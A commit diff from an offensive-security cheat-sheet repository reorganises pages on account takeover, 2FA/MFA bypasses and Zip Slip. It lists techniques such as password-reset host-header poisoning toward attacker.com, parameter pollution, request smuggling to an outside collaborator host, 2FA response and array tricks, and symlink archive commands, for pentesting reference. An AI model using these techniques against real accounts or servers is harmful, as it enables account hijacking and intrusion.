Fix markdown style issues in Account Takeover

This commit is contained in:
Swissky 2024-11-13 15:30:33 +01:00
parent a6b3b9dd05
commit 8bc33f8bb7
3 changed files with 144 additions and 162 deletions

View File

@ -2,43 +2,26 @@
> Account Takeover (ATO) is a significant threat in the cybersecurity landscape, involving unauthorized access to users' accounts through various attack vectors. > Account Takeover (ATO) is a significant threat in the cybersecurity landscape, involving unauthorized access to users' accounts through various attack vectors.
## Summary ## Summary
* [Password Reset Feature](#password-reset-feature) * [Password Reset Feature](#password-reset-feature)
* [Password Reset Token Leak Via Referrer](#password-reset-token-leak-via-referrer) * [Password Reset Token Leak via Referrer](#password-reset-token-leak-via-referrer)
* [Account Takeover Through Password Reset Poisoning](#account-takeover-through-password-reset-poisoning) * [Account Takeover Through Password Reset Poisoning](#account-takeover-through-password-reset-poisoning)
* [Password Reset Via Email Parameter](#password-reset-via-email-parameter) * [Password Reset via Email Parameter](#password-reset-via-email-parameter)
* [IDOR on API Parameters](#idor-on-api-parameters) * [IDOR on API Parameters](#idor-on-api-parameters)
* [Weak Password Reset Token](#weak-password-reset-token) * [Weak Password Reset Token](#weak-password-reset-token)
* [Leaking Password Reset Token](#leaking-password-reset-token) * [Leaking Password Reset Token](#leaking-password-reset-token)
* [Password Reset Via Username Collision](#password-reset-via-username-collision) * [Password Reset via Username Collision](#password-reset-via-username-collision)
* [Account takeover due to unicode normalization issue](#account-takeover-due-to-unicode-normalization-issue) * [Account Takeover Due To Unicode Normalization Issue](#account-takeover-due-to-unicode-normalization-issue)
* [Account Takeover Via Cross Site Scripting](#account-takeover-via-cross-site-scripting) * [Account Takeover via Web Vulneralities](#account-takeover-via-web-vulneralities)
* [Account Takeover Via HTTP Request Smuggling](#account-takeover-via-http-request-smuggling) * [Account Takeover via Cross Site Scripting](#account-takeover-via-cross-site-scripting)
* [Account Takeover via CSRF](#account-takeover-via-csrf) * [Account Takeover via HTTP Request Smuggling](#account-takeover-via-http-request-smuggling)
* [2FA Bypasses](#2fa-bypasses) * [Account Takeover via CSRF](#account-takeover-via-csrf)
* [Response Manipulation](#reponse-manipulation)
* [Status Code Manipulation](#status-code-manipulation)
* [2FA Code Leakage in Response](#2fa-code-leakage-in-response)
* [JS File Analysis](#js-file-analysis)
* [2FA Code Reusability](#2fa-code-reusability)
* [Lack of Brute-Force Protection](#lack-of-brute-force-protection)
* [Missing 2FA Code Integrity Validation](#missing-2fa-code-integrity-validation)
* [CSRF on 2FA Disabling](#csrf-on-2fa-disabling)
* [Password Reset Disable 2FA](#password-reset-disable-2fa)
* [Backup Code Abuse](#backup-code-abuse)
* [Clickjacking on 2FA Disabling Page](#clickjacking-on-2fa-disabling-page)
* [Enabling 2FA doesn't expire Previously active Sessions](#enabling-2fa-doesnt-expire-previously-active-sessions)
* [Bypass 2FA by Force Browsing](#bypass-2fa-by-force-browsing)
* [Bypass 2FA with null or 000000](#bypass-2fa-with-null-or-000000)
* [Bypass 2FA with array](#bypass-2fa-with-array)
* [References](#references) * [References](#references)
## Password Reset Feature ## Password Reset Feature
### Password Reset Token Leak Via Referrer ### Password Reset Token Leak via Referrer
1. Request password reset to your email address 1. Request password reset to your email address
2. Click on the password reset link 2. Click on the password reset link
@ -47,22 +30,22 @@
5. Intercept the request in Burp Suite proxy 5. Intercept the request in Burp Suite proxy
6. Check if the referer header is leaking password reset token. 6. Check if the referer header is leaking password reset token.
### Account Takeover Through Password Reset Poisoning ### Account Takeover Through Password Reset Poisoning
1. Intercept the password reset request in Burp Suite 1. Intercept the password reset request in Burp Suite
2. Add or edit the following headers in Burp Suite : `Host: attacker.com`, `X-Forwarded-Host: attacker.com` 2. Add or edit the following headers in Burp Suite : `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. Forward the request with the modified header 3. Forward the request with the modified header
```http ```http
POST https://example.com/reset.php HTTP/1.1 POST https://example.com/reset.php HTTP/1.1
Accept: */* Accept: */*
Content-Type: application/json Content-Type: application/json
Host: attacker.com Host: attacker.com
``` ```
4. Look for a password reset URL based on the *host header* like : `https://attacker.com/reset-password.php?token=TOKEN` 4. Look for a password reset URL based on the *host header* like : `https://attacker.com/reset-password.php?token=TOKEN`
### Password Reset via Email Parameter
### Password Reset Via Email Parameter
```powershell ```powershell
# parameter pollution # parameter pollution
@ -86,6 +69,7 @@ email=victim@mail.com|hacker@mail.com
1. Attacker have to login with their account and go to the **Change password** feature. 1. Attacker have to login with their account and go to the **Change password** feature.
2. Start the Burp Suite and Intercept the request 2. Start the Burp Suite and Intercept the request
3. Send it to the repeater tab and edit the parameters : User ID/email 3. Send it to the repeater tab and edit the parameters : User ID/email
```powershell ```powershell
POST /api/changepass POST /api/changepass
[...] [...]
@ -110,55 +94,60 @@ Try to determine if the token expire or if it's always the same, in some cases t
### Leaking Password Reset Token ### Leaking Password Reset Token
1. Trigger a password reset request using the API/UI for a specific email e.g: test@mail.com 1. Trigger a password reset request using the API/UI for a specific email e.g: <test@mail.com>
2. Inspect the server response and check for `resetToken` 2. Inspect the server response and check for `resetToken`
3. Then use the token in an URL like `https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]` 3. Then use the token in an URL like `https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]`
### Password Reset Via Username Collision ### Password Reset via Username Collision
1. Register on the system with a username identical to the victim's username, but with white spaces inserted before and/or after the username. e.g: `"admin "` 1. Register on the system with a username identical to the victim's username, but with white spaces inserted before and/or after the username. e.g: `"admin "`
2. Request a password reset with your malicious username. 2. Request a password reset with your malicious username.
3. Use the token sent to your email and reset the victim password. 3. Use the token sent to your email and reset the victim password.
4. Connect to the victim account with the new password. 4. Connect to the victim account with the new password.
The platform CTFd was vulnerable to this attack. The platform CTFd was vulnerable to this attack.
See: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245) See: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
### Account Takeover Due To Unicode Normalization Issue
### Account takeover due to unicode normalization issue
When processing user input involving unicode for case mapping or normalisation, unexcepted behavior can occur. When processing user input involving unicode for case mapping or normalisation, unexcepted behavior can occur.
- Victim account: `demo@gmail.com` * Victim account: `demo@gmail.com`
- Attacker account: `demⓞ@gmail.com` * Attacker account: `demⓞ@gmail.com`
[Unisub - is a tool that can suggest potential unicode characters that may be converted to a given character](https://github.com/tomnomnom/hacks/tree/master/unisub). [Unisub - is a tool that can suggest potential unicode characters that may be converted to a given character](https://github.com/tomnomnom/hacks/tree/master/unisub).
[Unicode pentester cheatsheet](https://gosecure.github.io/unicode-pentester-cheatsheet/) can be used to find list of suitable unicode characters based on platform. [Unicode pentester cheatsheet](https://gosecure.github.io/unicode-pentester-cheatsheet/) can be used to find list of suitable unicode characters based on platform.
## Account Takeover via Web Vulneralities
## Account Takeover Via Cross Site Scripting ### Account Takeover via Cross Site Scripting
1. Find an XSS inside the application or a subdomain if the cookies are scoped to the parent domain : `*.domain.com` 1. Find an XSS inside the application or a subdomain if the cookies are scoped to the parent domain : `*.domain.com`
2. Leak the current **sessions cookie** 2. Leak the current **sessions cookie**
3. Authenticate as the user using the cookie 3. Authenticate as the user using the cookie
### Account Takeover via HTTP Request Smuggling
## Account Takeover Via HTTP Request Smuggling
Refer to **HTTP Request Smuggling** vulnerability page. Refer to **HTTP Request Smuggling** vulnerability page.
1. Use **smuggler** to detect the type of HTTP Request Smuggling (CL, TE, CL.TE) 1. Use **smuggler** to detect the type of HTTP Request Smuggling (CL, TE, CL.TE)
```powershell ```powershell
git clone https://github.com/defparam/smuggler.git git clone https://github.com/defparam/smuggler.git
cd smuggler cd smuggler
python3 smuggler.py -h python3 smuggler.py -h
``` ```
2. Craft a request which will overwrite the `POST / HTTP/1.1` with the following data: 2. Craft a request which will overwrite the `POST / HTTP/1.1` with the following data:
```powershell ```powershell
GET http://something.burpcollaborator.net HTTP/1.1 GET http://something.burpcollaborator.net HTTP/1.1
X: X:
``` ```
3. Final request could look like the following 3. Final request could look like the following
```powershell ```powershell
GET / HTTP/1.1 GET / HTTP/1.1
Transfer-Encoding: chunked Transfer-Encoding: chunked
@ -171,128 +160,28 @@ Refer to **HTTP Request Smuggling** vulnerability page.
GET http://something.burpcollaborator.net HTTP/1.1 GET http://something.burpcollaborator.net HTTP/1.1
X: X X: X
``` ```
Hackerone reports exploiting this bug Hackerone reports exploiting this bug
* https://hackerone.com/reports/737140
* https://hackerone.com/reports/771666
* <https://hackerone.com/reports/737140>
* <https://hackerone.com/reports/771666>
## Account Takeover via CSRF ### Account Takeover via CSRF
1. Create a payload for the CSRF, e.g: "HTML form with auto submit for a password change" 1. Create a payload for the CSRF, e.g: "HTML form with auto submit for a password change"
2. Send the payload 2. Send the payload
### Account Takeover via JWT
## Account Takeover via JWT JSON Web Token might be used to authenticate an user.
JSON Web Token might be used to authenticate an user.
* Edit the JWT with another User ID / Email * Edit the JWT with another User ID / Email
* Check for weak JWT signature * Check for weak JWT signature
## 2FA Bypasses
### Response Manipulation
In response if `"success":false`
Change it to `"success":true`
### Status Code Manipulation
If Status Code is **4xx**
Try to change it to **200 OK** and see if it bypass restrictions
### 2FA Code Leakage in Response
Check the response of the 2FA Code Triggering Request to see if the code is leaked.
### JS File Analysis
Rare but some JS Files may contain info about the 2FA Code, worth giving a shot
### 2FA Code Reusability
Same code can be reused
### Lack of Brute-Force Protection
Possible to brute-force any length 2FA Code
### Missing 2FA Code Integrity Validation
Code for any user acc can be used to bypass the 2FA
### CSRF on 2FA Disabling
No CSRF Protection on disabling 2FA, also there is no auth confirmation
### Password Reset Disable 2FA
2FA gets disabled on password change/email change
### Backup Code Abuse
Bypassing 2FA by abusing the Backup code feature
Use the above mentioned techniques to bypass Backup Code to remove/reset 2FA restrictions
### Clickjacking on 2FA Disabling Page
Iframing the 2FA Disabling page and social engineering victim to disable the 2FA
### Enabling 2FA doesn't expire Previously active Sessions
If the session is already hijacked and there is a session timeout vuln
### Bypass 2FA by Force Browsing
If the application redirects to `/my-account` url upon login while 2Fa is disabled, try replacing `/2fa/verify` with `/my-account` while 2FA is enabled to bypass verification.
### Bypass 2FA with null or 000000
Enter the code **000000** or **null** to bypass 2FA protection.
### Bypass 2FA with array
```json
{
"otp":[
"1234",
"1111",
"1337", // GOOD OTP
"2222",
"3333",
"4444",
"5555"
]
}
```
## TODO
* Broken cryptography
* Session hijacking
* OAuth misconfiguration
## References ## References
- [$6,5k + $5k HTTP Request Smuggling mass account takeover - Slack + Zomato - Bug Bounty Reports Explained - August 30, 2020](https://www.youtube.com/watch?v=gzM4wWA7RFo) * [$6,5k + $5k HTTP Request Smuggling mass account takeover - Slack + Zomato - Bug Bounty Reports Explained - August 30, 2020](https://www.youtube.com/watch?v=gzM4wWA7RFo)
- [10 Password Reset Flaws - Anugrah SR - September 16, 2020](https://anugrahsr.github.io/posts/10-Password-reset-flaws/) * [10 Password Reset Flaws - Anugrah SR - September 16, 2020](https://anugrahsr.github.io/posts/10-Password-reset-flaws/)
- [Broken Cryptography & Account Takeovers - Harsh Bothra - September 20, 2020](https://speakerdeck.com/harshbothra/broken-cryptography-and-account-takeovers?slide=28) * [Broken Cryptography & Account Takeovers - Harsh Bothra - September 20, 2020](https://speakerdeck.com/harshbothra/broken-cryptography-and-account-takeovers?slide=28)
- [CTFd Account Takeover - NIST National Vulnerability Database - March 29, 2020](https://nvd.nist.gov/vuln/detail/CVE-2020-7245) * [CTFd Account Takeover - NIST National Vulnerability Database - March 29, 2020](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
- [Hacking Grindr Accounts with Copy and Paste - Troy Hunt - October 3, 2020](https://www.troyhunt.com/hacking-grindr-accounts-with-copy-and-paste/) * [Hacking Grindr Accounts with Copy and Paste - Troy Hunt - October 3, 2020](https://www.troyhunt.com/hacking-grindr-accounts-with-copy-and-paste/)

View File

@ -0,0 +1,99 @@
# MFA Bypasses
> Multi-Factor Authentication (MFA) is a security measure that requires users to provide two or more verification factors to gain access to a system, application, or network. It combines something the user knows (like a password), something they have (like a phone or security token), and/or something they are (biometric verification). This layered approach enhances security by making unauthorized access more difficult, even if a password is compromised.
> MFA Bypasses are techniques attackers use to circumvent MFA protections. These methods can include exploiting weaknesses in MFA implementations, intercepting authentication tokens, leveraging social engineering to manipulate users or support staff, or exploiting session-based vulnerabilities.
## Summary
* [Response Manipulation](#response-manipulation)
* [Status Code Manipulation](#status-code-manipulation)
* [2FA Code Leakage in Response](#2fa-code-leakage-in-response)
* [JS File Analysis](#js-file-analysis)
* [2FA Code Reusability](#2fa-code-reusability)
* [Lack of Brute-Force Protection](#lack-of-brute-force-protection)
* [Missing 2FA Code Integrity Validation](#missing-2fa-code-integrity-validation)
* [CSRF on 2FA Disabling](#csrf-on-2fa-disabling)
* [Password Reset Disable 2FA](#password-reset-disable-2fa)
* [Backup Code Abuse](#backup-code-abuse)
* [Clickjacking on 2FA Disabling Page](#clickjacking-on-2fa-disabling-page)
* [Enabling 2FA doesn't expire Previously active Sessions](#enabling-2fa-doesnt-expire-previously-active-sessions)
* [Bypass 2FA by Force Browsing](#bypass-2fa-by-force-browsing)
* [Bypass 2FA with null or 000000](#bypass-2fa-with-null-or-000000)
* [Bypass 2FA with array](#bypass-2fa-with-array)
## 2FA Bypasses
### Response Manipulation
In response if `"success":false`
Change it to `"success":true`
### Status Code Manipulation
If Status Code is **4xx**
Try to change it to **200 OK** and see if it bypass restrictions
### 2FA Code Leakage in Response
Check the response of the 2FA Code Triggering Request to see if the code is leaked.
### JS File Analysis
Rare but some JS Files may contain info about the 2FA Code, worth giving a shot
### 2FA Code Reusability
Same code can be reused
### Lack of Brute-Force Protection
Possible to brute-force any length 2FA Code
### Missing 2FA Code Integrity Validation
Code for any user acc can be used to bypass the 2FA
### CSRF on 2FA Disabling
No CSRF Protection on disabling 2FA, also there is no auth confirmation
### Password Reset Disable 2FA
2FA gets disabled on password change/email change
### Backup Code Abuse
Bypassing 2FA by abusing the Backup code feature
Use the above mentioned techniques to bypass Backup Code to remove/reset 2FA restrictions
### Clickjacking on 2FA Disabling Page
Iframing the 2FA Disabling page and social engineering victim to disable the 2FA
### Enabling 2FA doesn't expire Previously active Sessions
If the session is already hijacked and there is a session timeout vuln
### Bypass 2FA by Force Browsing
If the application redirects to `/my-account` url upon login while 2Fa is disabled, try replacing `/2fa/verify` with `/my-account` while 2FA is enabled to bypass verification.
### Bypass 2FA with null or 000000
Enter the code **000000** or **null** to bypass 2FA protection.
### Bypass 2FA with array
```json
{
"otp":[
"1234",
"1111",
"1337", // GOOD OTP
"2222",
"3333",
"4444",
"5555"
]
}
```

View File

@ -1,7 +1,6 @@
# Zip Slip # Zip Slip
> The vulnerability is exploited using a specially crafted archive that holds directory traversal filenames (e.g. ../../shell.php). The Zip Slip vulnerability can affect numerous archive formats, including tar, jar, war, cpio, apk, rar and 7z. The attacker can then overwrite executable files and either invoke them remotely or wait for the system or user to call them, thus achieving remote command execution on the victims machine. > The vulnerability is exploited using a specially crafted archive that holds directory traversal filenames (e.g. ../../shell.php). The Zip Slip vulnerability can affect numerous archive formats, including tar, jar, war, cpio, apk, rar and 7z. The attacker can then overwrite executable files and either invoke them remotely or wait for the system or user to call them, thus achieving remote command execution on the victims machine.
## Summary ## Summary
@ -11,12 +10,10 @@
* [Basic Exploit](#basic-exploit) * [Basic Exploit](#basic-exploit)
* [Additional Notes](#additional-notes) * [Additional Notes](#additional-notes)
## Tools ## Tools
- [ptoomey3/evilarc](https://github.com/ptoomey3/evilarc) - Create tar/zip archives that can exploit directory traversal vulnerabilities * [ptoomey3/evilarc](https://github.com/ptoomey3/evilarc) - Create tar/zip archives that can exploit directory traversal vulnerabilities
- [usdAG/slipit](https://github.com/usdAG/slipit) - Utility for creating ZipSlip archives * [usdAG/slipit](https://github.com/usdAG/slipit) - Utility for creating ZipSlip archives
## Methodology ## Methodology
@ -24,7 +21,6 @@
Any ZIP upload page on the application. Any ZIP upload page on the application.
### Basic Exploit ### Basic Exploit
Using [ptoomey3/evilarc](https://github.com/ptoomey3/evilarc): Using [ptoomey3/evilarc](https://github.com/ptoomey3/evilarc):
@ -40,13 +36,11 @@ ln -s ../../../index.php symindex.txt
zip --symlinks test.zip symindex.txt zip --symlinks test.zip symindex.txt
``` ```
### Additional Notes ### Additional Notes
For affected libraries and projects, visit [snyk/zip-slip-vulnerability](https://github.com/snyk/zip-slip-vulnerability) For affected libraries and projects, visit [snyk/zip-slip-vulnerability](https://github.com/snyk/zip-slip-vulnerability)
## References ## References
- [Zip Slip - Snyk - June 5, 2018](https://github.com/snyk/zip-slip-vulnerability) * [Zip Slip - Snyk - June 5, 2018](https://github.com/snyk/zip-slip-vulnerability)
- [Zip Slip Vulnerability - Snyk - April 15, 2018](https://snyk.io/research/zip-slip-vulnerability) * [Zip Slip Vulnerability - Snyk - April 15, 2018](https://snyk.io/research/zip-slip-vulnerability)